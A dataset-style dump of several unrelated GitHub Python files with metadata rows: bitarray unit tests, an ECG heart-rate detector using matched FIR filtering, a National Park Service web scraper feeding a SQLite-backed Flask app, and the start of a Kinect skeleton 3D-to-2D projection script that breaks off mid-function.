self.assertEqual(a, bitarray('01101'))
a = bitarray()
for n in range(256):
a.pack(bytes(bytearray([n])))
self.assertEqual(a, bitarray('0' + 255 * '1'))
self.assertRaises(TypeError, a.pack, 0)
if is_py3k:
self.assertRaises(TypeError, a.pack, '1')
self.assertRaises(TypeError, a.pack, [1, 3])
self.assertRaises(TypeError, a.pack, bitarray())
tests.append(StringTests)
# ---------------------------------------------------------------------------
class FileTests(unittest.TestCase, Util):
def setUp(self):
self.tmpdir = tempfile.mkdtemp()
self.tmpfname = os.path.join(self.tmpdir, 'testfile')
def tearDown(self):
shutil.rmtree(self.tmpdir)
def test_pickle(self):
for v in range(3):
for a in self.randombitarrays():
with open(self.tmpfname, 'wb') as fo:
pickle.dump(a, fo, v)
b = pickle.load(open(self.tmpfname, 'rb'))
self.assertFalse(b is a)
self.assertEQUAL(a, b)
def test_shelve(self):
if not shelve or hasattr(sys, 'gettotalrefcount'):
return
d = shelve.open(self.tmpfname)
stored = []
for a in self.randombitarrays():
key = hashlib.md5(repr(a).encode() +
a.endian().encode()).hexdigest()
d[key] = a
stored.append((key, a))
d.close()
del d
d = shelve.open(self.tmpfname)
for k, v in stored:
self.assertEQUAL(d[k], v)
d.close()
def test_fromfile_wrong_args(self):
b = bitarray()
self.assertRaises(TypeError, b.fromfile)
self.assertRaises(TypeError, b.fromfile, StringIO()) # file not open
self.assertRaises(TypeError, b.fromfile, 42)
self.assertRaises(TypeError, b.fromfile, 'bar')
def test_from_empty_file(self):
with open(self.tmpfname, 'wb') as fo:
pass
a = bitarray()
a.fromfile(open(self.tmpfname, 'rb'))
self.assertEqual(a, bitarray())
def test_from_large_file(self):
N = 100000
with open(self.tmpfname, 'wb') as fo:
fo.write(N * b'X')
a = bitarray()
a.fromfile(open(self.tmpfname, 'rb'))
self.assertEqual(len(a), 8 * N)
self.assertEqual(a.buffer_info()[1], N)
# make sure there is no over-allocation
self.assertEqual(a.buffer_info()[4], N)
def test_fromfile_Foo(self):
with open(self.tmpfname, 'wb') as fo:
fo.write(b'Foo\n')
a = bitarray(endian='big')
a.fromfile(open(self.tmpfname, 'rb'))
self.assertEqual(a, bitarray('01000110011011110110111100001010'))
a = bitarray(endian='little')
a.fromfile(open(self.tmpfname, 'rb'))
self.assertEqual(a, bitarray('01100010111101101111011001010000'))
a = bitarray('1', endian='little')
a.fromfile(open(self.tmpfname, 'rb'))
self.assertEqual(a, bitarray('101100010111101101111011001010000'))
for n in range(20):
a = bitarray(n, endian='little')
a.setall(1)
a.fromfile(open(self.tmpfname, 'rb'))
self.assertEqual(a,
n*bitarray('1') +
bitarray('01100010111101101111011001010000'))
def test_fromfile_n(self):
a = bitarray()
a.fromstring('ABCDEFGHIJ')
with open(self.tmpfname, 'wb') as fo:
a.tofile(fo)
b = bitarray()
with open(self.tmpfname, 'rb') as f:
b.fromfile(f, 0); self.assertEqual(b.tostring(), '')
b.fromfile(f, 1); self.assertEqual(b.tostring(), 'A')
f.read(1)
b = bitarray()
b.fromfile(f, 2); self.assertEqual(b.tostring(), 'CD')
b.fromfile(f, 1); self.assertEqual(b.tostring(), 'CDE')
b.fromfile(f, 0); self.assertEqual(b.tostring(), 'CDE')
b.fromfile(f); self.assertEqual(b.tostring(), 'CDEFGHIJ')
b.fromfile(f); self.assertEqual(b.tostring(), 'CDEFGHIJ')
b = bitarray()
with open(self.tmpfname, 'rb') as f:
f.read(1);
self.assertRaises(EOFError, b.fromfile, f, 10)
self.assertEqual(b.tostring(), 'BCDEFGHIJ')
b = bitarray()
with open(self.tmpfname, 'rb') as f:
b.fromfile(f);
self.assertEqual(b.tostring(), 'ABCDEFGHIJ')
self.assertRaises(EOFError, b.fromfile, f, 1)
def test_tofile(self):
a = bitarray()
with open(self.tmpfname, 'wb') as f:
a.tofile(f)
with open(self.tmpfname, 'rb') as fi:
self.assertEqual(fi.read(), b'')
a = bitarray('01000110011011110110111100001010', endian='big')
with open(self.tmpfname, 'wb') as f:
a.tofile(f)
with open(self.tmpfname, 'rb') as fi:
self.assertEqual(fi.read(), b'Foo\n')
for a in self.randombitarrays():
b = bitarray(a, endian='big')
with open(self.tmpfname, 'wb') as fo:
b.tofile(fo)
s = open(self.tmpfname, 'rb').read()
self.assertEqual(len(s), a.buffer_info()[1])
for n in range(3):
a.fromstring(n * 'A')
self.assertRaises(TypeError, a.tofile)
self.assertRaises(TypeError, a.tofile, StringIO())
with open(self.tmpfname, 'wb') as f:
a.tofile(f)
self.assertRaises(TypeError, a.tofile, f)
for n in range(20):
a = n * bitarray('1', endian='little')
with open(self.tmpfname, 'wb') as fo:
a.tofile(fo)
s = open(self.tmpfname, 'rb').read()
self.assertEqual(len(s), a.buffer_info()[1])
b = a.copy()
b.fill()
c = bitarray(endian='little')
c.frombytes(s)
self.assertEqual(c, b)
tests.append(FileTests)
# ---------------------------------------------------------------------------
class PrefixCodeTests(unittest.TestCase, Util):
def test_encode_string(self):
a = bitarray()
d = {'a': bitarray('0')}
a.encode(d, '')
self.assertEqual(a, bitarray())
a.encode(d, 'a')
self.assertEqual(a, bitarray('0'))
self.assertEqual(d, {'a': bitarray('0')})
def test_encode_list(self):
a = bitarray()
d = {'a': bitarray('0')}
a.encode(d, [])
self.assertEqual(a, bitarray())
a.encode(d, ['a'])
self.assertEqual(a, bitarray('0'))
self.assertEqual(d, {'a': bitarray('0')})
def test_encode_iter(self):
a = bitarray()
d = {'a': bitarray('0'), 'b': bitarray('1')}
a.encode(d, iter('abba'))
self.assertEqual(a, bitarray('0110'))
def foo():
for c in 'bbaabb':
yield c
a.encode(d, foo())
self.assertEqual(a, bitarray('0110110011'))
self.assertEqual(d, {'a': bitarray('0'), 'b': bitarray('1')})
def test_encode(self):
d = {'I': bitarray('1'),
'l': bitarray('01'),
'a': bitarray('001'),
'n': bitarray('000')}
a = bitarray()
a.encode(d, 'Ilan')
self.assertEqual(a, bitarray('101001000'))
a.encode(d, 'a')
self.assertEqual(a, bitarray('101001000001'))
self.assertEqual(d, {'I': bitarray('1'), 'l': bitarray('01'),
'a': bitarray('001'), 'n': bitarray('000')})
self.assertRaises(ValueError, a.encode, d, 'arvin')
def test_encode_symbol_not_in_code(self):
d = {None : bitarray('0'),
0 : bitarray('10'),
'A' : bitarray('11')}
a = bitarray()
a.encode(d, ['A', None, 0])
self.assertEqual(a, bitarray('11010'))
self.assertRaises(ValueError, a.encode, d, [1, 2])
self.assertRaises(ValueError, a.encode, d, 'ABCD')
def test_encode_not_iterable(self):
d = {'a': bitarray('0'), 'b': bitarray('1')}
a = bitarray()
a.encode(d, 'abba')
self.assertRaises(TypeError, a.encode, d, 42)
self.assertRaises(TypeError, a.encode, d, 1.3)
self.assertRaises(TypeError, a.encode, d, None)
self.assertEqual(a, bitarray('0110'))
def test_check_codedict_encode(self):
a = bitarray()
self.assertRaises(TypeError, a.encode, None, '')
self.assertRaises(ValueError, a.encode, {}, '')
self.assertRaises(TypeError, a.encode, {'a': 'b'}, '')
self.assertRaises(ValueError, a.encode, {'a': bitarray()}, '')
self.assertEqual(len(a), 0)
def test_check_codedict_decode(self):
a = bitarray('101')
self.assertRaises(TypeError, a.decode, 0)
self.assertRaises(ValueError, a.decode, {})
self.assertRaises(TypeError, a.decode, {'a': 42})
self.assertRaises(ValueError, a.decode, {'a': bitarray()})
self.assertEqual(a, bitarray('101'))
def test_check_codedict_iterdecode(self):
a = bitarray('1100101')
self.assertRaises(TypeError, a.iterdecode, 0)
self.assertRaises(ValueError, a.iterdecode, {})
self.assertRaises(TypeError, a.iterdecode, {'a': []})
self.assertRaises(ValueError, a.iterdecode, {'a': bitarray()})
self.assertEqual(a, bitarray('1100101'))
def test_decode_simple(self):
d = {'I': bitarray('1'),
'l': bitarray('01'),
'a': bitarray('001'),
'n': bitarray('000')}
dcopy = dict(d)
a = bitarray('101001000')
self.assertEqual(a.decode(d), ['I', 'l', 'a', 'n'])
self.assertEqual(d, dcopy)
self.assertEqual(a, bitarray('101001000'))
def test_iterdecode_simple(self):
d = {'I': bitarray('1'),
'l': bitarray('01'),
'a': bitarray('001'),
'n': bitarray('000')}
dcopy = dict(d)
a = bitarray('101001000')
self.assertEqual(list(a.iterdecode(d)), ['I', 'l', 'a', 'n'])
self.assertEqual(d, dcopy)
self.assertEqual(a, bitarray('101001000'))
def test_decode_empty(self):
d = {'a': bitarray('1')}
a = bitarray()
self.assertEqual(a.decode(d), [])
self.assertEqual(d, {'a': bitarray('1')})
# test decode iterator
self.assertEqual(list(a.iterdecode(d)), [])
self.assertEqual(d, {'a': bitarray('1')})
self.assertEqual(len(a), 0)
def test_decode_no_term(self):
d = {'a': bitarray('0'), 'b': bitarray('111')}
a = bitarray('011')
self.assertRaises(ValueError, a.decode, d)
self.assertEqual(a, bitarray('011'))
self.assertEqual(d, {'a': bitarray('0'), 'b': bitarray('111')})
def test_decode_buggybitarray(self):
d = {'a': bitarray('0')}
a = bitarray('1')
self.assertRaises(ValueError, a.decode, d)
self.assertEqual(a, bitarray('1'))
self.assertEqual(d, {'a': bitarray('0')})
def test_iterdecode_no_term(self):
d = {'a': bitarray('0'), 'b': bitarray('111')}
a = bitarray('011')
it = a.iterdecode(d)
if not is_py3k:
self.assertEqual(it.next(), 'a')
self.assertRaises(ValueError, it.next)
self.assertEqual(a, bitarray('011'))
self.assertEqual(d, {'a': bitarray('0'), 'b': bitarray('111')})
def test_iterdecode_buggybitarray(self):
d = {'a': bitarray('0')}
a = bitarray('1')
it = a.iterdecode(d)
if not is_py3k:
self.assertRaises(ValueError, it.next)
self.assertEqual(a, bitarray('1'))
self.assertEqual(d, {'a': bitarray('0')})
def test_decode_buggybitarray2(self):
d = {'a': bitarray('00'), 'b': bitarray('01')}
a = bitarray('1')
self.assertRaises(ValueError, a.decode, d)
self.assertEqual(a, bitarray('1'))
def test_iterdecode_buggybitarray2(self):
d = {'a': bitarray('00'), 'b': bitarray('01')}
a = bitarray('1')
it = a.iterdecode(d)
if not is_py3k:
self.assertRaises(ValueError, it.next)
self.assertEqual(a, bitarray('1'))
def test_decode_ambiguous_code(self):
for d in [
{'a': bitarray('0'), 'b': bitarray('0'), 'c': bitarray('1')},
{'a': bitarray('01'), 'b': bitarray('01'), 'c': bitarray('1')},
{'a': bitarray('0'), 'b': bitarray('01')},
{'a': bitarray('0'), 'b': bitarray('11'), 'c': bitarray('111')},
]:
a = bitarray()
self.assertRaises(ValueError, a.decode, d)
self.assertRaises(ValueError, a.iterdecode, d)
def test_miscitems(self):
d = {None : bitarray('00'),
0 : bitarray('110'),
1 : bitarray('111'),
'' : bitarray('010'),
2 : bitarray('011')}
a = bitarray()
a.encode(d, [None, 0, 1, '', 2])
self.assertEqual(a, bitarray('00110111010011'))
self.assertEqual(a.decode(d), [None, 0, 1, '', 2])
# iterator
it = a.iterdecode(d)
self.assertEqual(next(it), None)
self.assertEqual(next(it), 0)
self.assertEqual(next(it), 1)
self.assertEqual(next(it), '')
self.assertEqual(next(it), 2)
self.assertStopIteration(it)
def test_real_example(self):
code = {' ': bitarray('001'),
'.': bitarray('0101010'),
'a': bitarray('0110'),
'b': bitarray('0001100'),
'c': bitarray('000011'),
'd': bitarray('01011'),
'e': bitarray('111'),
'f': bitarray('010100'),
'g': bitarray('101000'),
'h': bitarray('00000'),
'i': bitarray('1011'),
'j': bitarray('0111101111'),
'k': bitarray('00011010'),
'l': bitarray('01110'),
'm': bitarray('000111'),
'n': bitarray('1001'),
'o': bitarray('1000'),
'p': bitarray('101001'),
'q': bitarray('00001001101'),
'r': bitarray('1101'),
's': bitarray('1100'),
't': bitarray('0100'),
'u': bitarray('000100'),
'v': bitarray('0111100'),
'w': bitarray('011111'),
'x': bitarray('0000100011'),
'y': bitarray('101010'),
'z': bitarray('00011011110')}
a = bitarray()
message = 'the quick brown fox jumps over the lazy dog.'
a.encode(code, message)
self.assertEqual(a, bitarray('01000000011100100001001101000100101100'
'00110001101000100011001101100001111110010010101001000000010001100'
'10111101111000100000111101001110000110000111100111110100101000000'
'0111001011100110000110111101010100010101110001010000101010'))
self.assertEqual(''.join(a.decode(code)), message)
self.assertEqual(''.join(a.iterdecode(code)), message)
tests.append(PrefixCodeTests)
# -------------- Buffer Interface (Python 2.7 and above) --------------------
class BufferInterfaceTests(unittest.TestCase):
def test_read1(self):
a = bitarray('01000001' '01000010' '01000011', endian='big')
v = memoryview(a)
self.assertEqual(len(v), 3)
self.assertEqual(v[0], 65 if is_py3k else 'A')
self.assertEqual(v.tobytes(), b'ABC')
a[13] = 1
self.assertEqual(v.tobytes(), b'AFC')
def test_read2(self):
a = bitarray()
a.frombytes(os.urandom(100))
v = memoryview(a)
self.assertEqual(len(v), 100)
b = a[34 * 8 : 67 * 8]
self.assertEqual(v[34:67].tobytes(), b.tobytes())
self.assertEqual(v.tobytes(), a.tobytes())
def test_write(self):
a = bitarray(8000)
a.setall(0)
v = memoryview(a)
self.assertFalse(v.readonly)
v[500] = 255 if is_py3k else '\xff'
self.assertEqual(a[3999:4009], bitarray('0111111110'))
a[4003] = 0
self.assertEqual(a[3999:4009], bitarray('0111011110'))
v[301:304] = b'ABC'
self.assertEqual(a[300 *8 : 305 * 8].tobytes(), b'\x00ABC\x00')
if sys.version_info[:2] >= (2, 7):
tests.append(BufferInterfaceTests)
# ---------------------------------------------------------------------------
class TestsFrozenbitarray(unittest.TestCase, Util):
def test_init(self):
a = frozenbitarray('110')
self.assertEqual(a, bitarray('110'))
self.assertEqual(a.to01(), '110')
for endian in 'big', 'little':
a = frozenbitarray(0, endian)
self.assertEqual(a.endian(), endian)
def test_methods(self):
# test a few methods which do not raise the TypeError
a = frozenbitarray('1101100')
self.assertEqual(a[2], 0)
self.assertEqual(a[:4].to01(), '1101')
self.assertEqual(a.count(), 4)
self.assertEqual(a.index(0), 2)
b = a.copy()
self.assertEqual(b, a)
self.assertEqual(repr(type(b)), "<class 'bitarray.frozenbitarray'>")
self.assertEqual(len(b), 7)
self.assertEqual(b.length(), 7)
self.assertEqual(b.all(), False)
self.assertEqual(b.any(), True)
def test_init_bitarray(self):
for a in self.randombitarrays():
b = frozenbitarray(a)
self.assertFalse(b is a)
self.assertEqual(b, a)
self.assertEqual(b.endian(), a.endian())
c = frozenbitarray(b)
self.assertEqual(c, b)
self.assertFalse(c is b)
self.assertEqual(c.endian(), a.endian())
self.assertEqual(hash(c), hash(b))
def test_repr(self):
a = frozenbitarray()
self.assertEqual(repr(a), "frozenbitarray()")
self.assertEqual(str(a), "frozenbitarray()")
a = frozenbitarray('10111')
self.assertEqual(repr(a), "frozenbitarray('10111')")
self.assertEqual(str(a), "frozenbitarray('10111')")
def test_immutable(self):
a = frozenbitarray('111')
self.assertRaises(TypeError, a.append, True)
self.assertRaises(TypeError, a.__setitem__, 0, 0)
self.assertRaises(TypeError, a.__delitem__, 0)
def test_dictkey(self):
a = frozenbitarray('01')
b = frozenbitarray('1001')
d = {a: 123, b: 345}
self.assertEqual(d[frozenbitarray('01')], 123)
self.assertEqual(d[frozenbitarray(b)], 345)
def test_dictkey2(self): # taken sllightly modified from issue #74
a1 = frozenbitarray([True, False])
a2 = frozenbitarray([False, False])
dct = {a1: "one", a2: "two"}
a3 = frozenbitarray([True, False])
self.assertEqual(a3, a1)
self.assertEqual(dct[a3], 'one')
def test_mix(self):
a = bitarray('110')
b = frozenbitarray('0011')
self.assertEqual(a + b, bitarray('1100011'))
a.extend(b)
self.assertEqual(a, bitarray('1100011'))
tests.append(TestsFrozenbitarray)
# ---------------------------------------------------------------------------
def run(verbosity=1, repeat=1):
import bitarray.test_util as btu
tests.extend(btu.tests)
print('bitarray is installed in: %s' % os.path.dirname(__file__))
print('bitarray version: %s' % __version__)
print('Python version: %s' % sys.version)
suite = unittest.TestSuite()
for cls in tests:
for _ in range(repeat):
suite.addTest(unittest.makeSuite(cls))
runner = unittest.TextTestRunner(verbosity=verbosity)
return runner.run(suite)
if __name__ == '__main__':
run()
| MLY0813/FlashSwapForCofixAndUni | FlashSwapForCofixAndUni/venv/lib/python3.9/site-packages/bitarray/test_bitarray.py | test_bitarray.py | py | 78,361 | python | en | code | 70 | github-code | 36 | [
{
"api_name": "sys.version_info",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "random.randint",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "bitarray.bitarray",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "random.randint... |
70631265063 | #Importing required libraries
import numpy as np
from matplotlib import pyplot as plt
import firfilter
import hpbsfilter
#Function that plots the time domain waveform of the signal of interest
def PlotWaveform(title, ycords):
fs=1000
plt.figure(figsize=(13.33,7.5))
plt.title(title)
plt.xlabel('Time [s]')
plt.ylabel('Amplitude [mV]')
time=np.linspace(0,len(ycords)/fs,len(ycords))
plt.plot(time,ycords)
plt.show()
#Function that plots the step graph for of the Momentary Heart Rate changes along time
def PlotWaveformStep(title, ycords):
fs=1000
plt.figure(figsize=(13.33,7.5))
plt.title(title)
plt.xlabel('Time [s]')
plt.ylabel('Amplitude [mV]')
time=np.linspace(0,len(ycords)/fs,len(ycords))
plt.step(time,ycords)
plt.show()
#Function that creates the ecg template for the matched FIR filter
def GenerateECGTemplate(samples, samplingFrequency):
filteredSamples = []
finalSamples = []
# Create the filter coefficients to remove the 50Hz noise and baseband wander
bandstopfir = hpbsfilter.fir_coeff()
firCoefficients = bandstopfir.bandstopDesign(1000, 45, 55)
# Initialize FIR
fir = firfilter.FIR_filter(firCoefficients)
# Generating the tempelate from only the first 4000 samples to prevent long wait time
for x in range(4000):
filteredSamples.append(fir.dofilter(samples[x]))
highpassfir = hpbsfilter.fir_coeff()
firCoefficients = highpassfir.highpassDesign(1000, 0.5)
# Initialize FIR
fir = firfilter.FIR_filter(firCoefficients)
for x in range(4000):
finalSamples.append(fir.dofilter(filteredSamples[x]))
# Plot Filtered ECG waveform
PlotWaveform("Filtered ECG", finalSamples)
# Get one Period of ECG to form the template
ecgSlice = finalSamples[2800:3600] # [760:870]
# Flip to create the time reversed tempelate for the filter coefficients
template = np.flip(ecgSlice)
# Plotting both the ECG slices
hpbsfilter.ecgNormPlot('ECG Slice', ecgSlice)
hpbsfilter.ecgNormPlot('ECG Template', template)
# Reset FIR filters ringbuffer and offset
fir.ResetFilter()
# Return the filter object and template coefficients
return fir, template
#Main body of the program
if __name__ == "__main__":
#Load the ecg data
ecg_data = np.loadtxt("ECG_1000Hz_13.dat")
fs = 1000
nofsamples = len(ecg_data)
fir, template = GenerateECGTemplate(ecg_data, 1000)
filteredSmaples = np.zeros(nofsamples)
squaredSamples = np.zeros(nofsamples)
# Peak Detector with Heart rate tracking
#Define the peak detector variables
peakIndex = []
# Momentary heart rate array
m = []
lastPeak = 0
nPeaks = 0
#Heuristics variable to prevent bogus detection
pulseSettlingSamplecCnt = 37
peakFlag = False
#Set the threshold to detect peaks based on the amplitude of the delta plulses
amplitudeThreshold = 20
# Initialize matched filter object
Templatefir = firfilter.FIR_filter(template)
# Simulate causal system by filtering signal sample by sample
# Filter the baseband wander and 50hH
filteredSmaples = hpbsfilter.finalfilteredECGData()
for x in range(nofsamples):
# Apply the matched filter to generate the peaks
squaredSamples[x] = Templatefir.dofilter(filteredSmaples[x])
# Square the output samples to pronounce the amplitude and suppress the noise to get the delta pulses
squaredSamples[x] = squaredSamples[x] * squaredSamples[x]
# Wait for the filter to settle
if(x > 2000):
# Detect the peaks
# If sample amplitude is above threshold, the peak hasn't been detected yet with some heuristics to prevent bogus detections
if( squaredSamples[x] > amplitudeThreshold and peakFlag == False and (x - lastPeak ) >= pulseSettlingSamplecCnt ):
peakFlag = True
# If the amplitude exceeded the threshold and previous sample was higher that must've been a peak
if( squaredSamples[x - 1] > squaredSamples[x] and peakFlag == True ):
peakFlag = False
# Holding the index as last peak index
lastPeak = (x - 1)
#Append the index of that sample to list
peakIndex.append( lastPeak )
# Increment peak counter
nPeaks += 1
# Calculating the momentary heart rate in BPM
#Minimum of 2 peaks are required to generate the number of samples between them
if ( nPeaks >= 2):
# Calculating the number of samples between peaks
t = lastPeak - peakIndex[ nPeaks - 2]
# Calculating the momentary rate in BPM
m.append( (fs/t)*60 )
# Plotting the original time domain response of the ECG
hpbsfilter.ecgNormPlot('Time domain signal of the original ECG', ecg_data)
# Plotting the filtered time domain response of the ECG
hpbsfilter.ecgNormPlot('Time domain signal of the filtered ECG', filteredSmaples)
# Plotting the filtered frequency response of the ECG
hpbsfilter.ecgFreqPlot('Frequency responce of the filtered ECG',filteredSmaples,fs)
#Plotting the delta pulses returned by the matched filter
PlotWaveform("Delta Pulses obtained after matched filtering", squaredSamples)
#Plotting the momentary heart rate as a step graph
PlotWaveformStep("Momenrary Heart Rate", m)
#Print the number of heart beats detected
print("Number of beats detected: " + str(nPeaks) )
#Print the average BMP detected from the delta pulses
print("Average Momentary Heart Rate (in BPM): %.1f" % (sum(m)/len(m)))
| Devashrutha/ECG-Causal-Processing-using-FIR-Filters | hrdetect.py | hrdetect.py | py | 5,978 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.title",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "ma... |
1116068523 | import os
from flask import Flask, render_template, session, redirect, url_for # tools that will make it easier to build on things
from flask_sqlalchemy import SQLAlchemy # handles database stuff for us - need to pip install flask_sqlalchemy in your virtual env, environment, etc to use this and run this
import requests, json
from bs4 import BeautifulSoup
from advanced_expiry_caching import Cache
# import numpy as np
import pandas as pd
######
# Constants
START_URL = "https://www.nps.gov/index.htm"
FILENAME = "nps_cache.json"
PROGRAM_CACHE = Cache(FILENAME)
# assuming constants exist as such
# use a tool to build functionality here
def access_page_data(url):
data = PROGRAM_CACHE.get(url)
if not data:
data = requests.get(url).text
PROGRAM_CACHE.set(url, data) # default here with the Cache.set tool is that it will expire in 7 days, which is probs fine, but something to explore
return data
###### Scraping the data from the website
main_page = access_page_data(START_URL)
main_soup = BeautifulSoup(main_page, features="html.parser")
# print(main_soup.prettify())
list_of_topics = main_soup.find('ul', class_='dropdown-menu SearchBar-keywordSearch')
# all_links = list_of_topics.find_all('a')
# print(all_links)
states_urls = []
for link in list_of_topics.find_all('a'):
# print(link.get('href'))
states_urls.append("{}{}".format("https://www.nps.gov",link.get('href')))
# print(states_urls)
nps_dic = {} #dictionary of lists
nps_dic['Type'] = []
nps_dic['Name'] = []
nps_dic['Location'] = []
nps_dic['State'] = []
nps_dic['Description'] = []
for url in states_urls:
state_page = access_page_data(url)
state_soup = BeautifulSoup(state_page, features="html.parser")
# print(state_soup.prettify())
for each_item in state_soup.find("h1", class_="page-title"):
sitestate = each_item
# print(sitestate) <--- Check whether it prints out the list of states
for each_item in state_soup.find("ul", id="list_parks").find_all('li', class_="clearfix"):
# print('===============')
# print(each_item)
# print('===============')
sitetype = each_item.find('h2')
sitename = each_item.find('h3').find('a')
sitelocation = each_item.find('h4')
sitedescription = each_item.find('p')
nps_dic['State'].append(sitestate)
if (sitetype) and (sitetype.text != ""):
nps_dic['Type'].append(sitetype.text)
else:
nps_dic['Type'].append("None")
if (sitename) and (sitename.text != ""):
nps_dic['Name'].append(sitename.text)
else:
nps_dic['Name'].append("None")
if (sitelocation) and (sitelocation.text != ""):
nps_dic['Location'].append(sitelocation.text)
else:
nps_dic['Location'].append("None")
if (sitedescription) and (sitedescription.text != ""):
nps_dic['Description'].append(sitedescription.text.strip())
else:
nps_dic['Description'].append("None")
# print(nps_dic)
##### Save the scraped data into CSV file.
nps_data = pd.DataFrame.from_dict(nps_dic)
nps_data.to_csv('nps.csv')
# for each in nps_dic.keys():
# print(len(nps_dic[each]))
###### Now with 'nps.csv' file, I am going to make db file using sqlalchemy.
import sqlite3
import csv
from sqlalchemy import Column, ForeignKey, Integer, String, Text, Float, REAL
sqlite_file = 'nps.db'
# Connecting to the database file
conn = sqlite3.connect(sqlite_file)
c = conn.cursor() # Object that allows us to use Python to act on the database
# Often easier to start with the "simplest" table and go on from there
c.execute('''DROP TABLE IF EXISTS 'State';''')
c.execute('''CREATE TABLE State (StateId INTEGER PRIMARY KEY AUTOINCREMENT, State TEXT)''')
state_lst = []
with open('nps.csv') as csvfile:
readCSV = csv.reader(csvfile, delimiter=',')
for row in readCSV:
if not row[4] in state_lst:
state_lst.append(row[4])
state_lst_itself = state_lst[1:]
# print(state_lst_itself)
c.executemany('INSERT INTO State (State) VALUES(?)', zip(state_lst_itself))
c.execute('''DROP TABLE IF EXISTS 'Park';''')
c.execute('''CREATE TABLE Park (ParkId INTEGER PRIMARY KEY AUTOINCREMENT, ParkName TEXT, ParkType TEXT, ParkLocation TEXT, StateId INTEGER, Description TEXT, CONSTRAINT fk_States FOREIGN KEY (StateId) REFERENCES State(StateId))''')
# Three quotations make it possible for this to become a multi-line string, which can make it easier to organize and read
each_lst = []
with open('nps.csv') as csvfile:
readCSV = csv.reader(csvfile, delimiter=',')
readCSV.__next__()
for row in readCSV:
state_name = (row[4],)
# print(type(state_name))
c.execute("SELECT StateId FROM State WHERE State.State = ?" , state_name)
fetch_state_name = c.fetchone()
state_id = int(fetch_state_name[0])
# print(fetch_state_name)
each_lst.append((row[2], row[1], row[3], state_id, row[5]))
# print(each_lst)
c.executemany('INSERT INTO Park(ParkName, ParkType, ParkLocation, StateId, Description) VALUES (?,?,?,?,?)', each_lst)
conn.commit()
conn.close()
######
# Application configurations
from flask import Flask, render_template, session, redirect, url_for, g
app = Flask(__name__)
DATABASE = 'nps.db'
def get_db():
db = getattr(g, '_database', None)
if db is None:
db = g._database = sqlite3.connect(DATABASE)
return db
##### Set up Controllers (route functions) #####
## Main route
@app.route('/')
def index():
cur = get_db().cursor()
cur.execute("select * from Park")
rows = cur.fetchall()
park_num = len(rows)
return render_template('index.html', park_num = park_num)
@app.route('/all_states')
def all_states():
cur = get_db().cursor()
cur.execute("select * from State")
rows = cur.fetchall()
state_list = []
for each in rows:
state_name = each[1]
state_list.append(state_name)
return render_template('all_states.html', state_name = state_name, state_list = state_list)
@app.route('/state/<state>')
def each_state(state):
cur = get_db().cursor()
cur.execute("select State, ParkName, ParkType, ParkLocation, Description from Park natural inner join State")
parks = cur.fetchall() # It will be rows of pakrs in the certain state. It could be one or multiple locations.
# print(parks)
park_dic = {}
park_dic["park_lst"]=[]
for each_park in parks:
if each_park[0] == state:
park_dic["park_lst"].append(each_park[1:])
return render_template('each_state.html', state_name=state, park_lst=park_dic["park_lst"])
if __name__ == '__main__':
app.run()
| graphicsmini/507_project_final | SI507project_tools.py | SI507project_tools.py | py | 6,752 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "advanced_expiry_caching.Cache",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "bs4.Beau... |
43506809963 | import numpy as np
import csv
import os
import cv2
import matplotlib.pyplot as plt
from xml.etree import ElementTree as ET
import argparse
parser = argparse.ArgumentParser(description='compare mediapipe and kinect skeleton data', epilog = 'Enjoy the program! :)')
parser.add_argument('--inputfile', default =r'/datasets_nas/elma1294/example_tape/dominikw_front_0/e4sm_tape-2021-08-18_14-07-44.211275_skeletons.shuttleFront.csv',
help = 'The address of the input csv file')
parser.add_argument('--sample_image', default = r'/datasets_nas/elma1294/example_tape/dominikw_front_0/e4sm_tape-2021-08-18_14-07-44.211275_png.shuttleFront/shuttleFront_Kinect_ColorImage1629288474191866000.jpg',
help = 'sample image to get the width and height of the image')
parser.add_argument('--output_directory', default=r'/datasets_nas/elma1294/results' , help = 'The address of the results')
arguments = parser.parse_args()
path = arguments.inputfile
file_path = arguments.sample_image
output_directory = arguments.output_directory
output_kineckt = os.path.join(output_directory, 'results3Dto2Dnew.csv')
def _parse_camera_parameter(camera_name: str):
assert camera_name in ['shuttleFront', 'shuttleSide', 'spike']
# parse serialized kinect azure calibration
root = ET.parse(f'intrinsics/{camera_name}.xml').getroot()
root = root.find('KinectAzureCalibration')
# get color intrinsics as cx, cy, fx, fy
color_params = root.find('color_camera_calibration')
# intrsinics
intrinsics = color_params.find('intrinsics').find('parameters').findall('item')
cx = float(intrinsics[0].text)
cy = float(intrinsics[1].text)
fx = float(intrinsics[2].text)
fy = float(intrinsics[3].text)
# get transformation from depth frame to color frame
# the kinect sdk defines the local transformation tree as
# mount frame -> depth_frame -> color_frame
# so we can just parse the extrinsics from color camera which represents
# the transformation depth_frame -> color_frame
extrinsics = color_params.find('extrinsics')
# NOTE: rotation matrix is serialized as simple vector
rotation = extrinsics.find('rotation').findall('item')
translation = extrinsics.find('translation').findall('item')
rotation_vec = np.zeros(9)
for i, el in enumerate(rotation):
rotation_vec[i] = el.text
translation_vec = np.zeros(3)
for i, el in enumerate(translation):
translation_vec[i] = el.text
# translation is given in mm
# as we work in m we convert
translation_vec *= 0.001
transform = np.eye(4)
transform[:3, :3] = rotation_vec.reshape(3, 3)
transform[:3, 3] = translation_vec
return [cx, cy, fx, fy], transform
def convert_3d_to_2d_position(x,y,z, transform, camera_parameter, width, height):
''' with Intrinsic Parameter i defined Camera Matrix to get the 2D Position'''
xc = float(x)
yc = float(y)
zc = float(z)
xc, yc, zc = np.dot(transform, np.array([xc, yc, zc, 1]))[:3]
#shutlefront
cx, cy, fx, fy = camera_parameter
if len(x) < 1 or len(y) < 1 or len(z) <1:
return 0,0
k = np.array([[fx,0,cx],[0,fy,cy],[0,0,1]])
one = np.array([[1,0,0,0],[0,1,0,0],[0,0,1,0]])
camera_matrix = np.array([[xc],[yc],[zc],[1]])
m1 = np.dot(k,one)
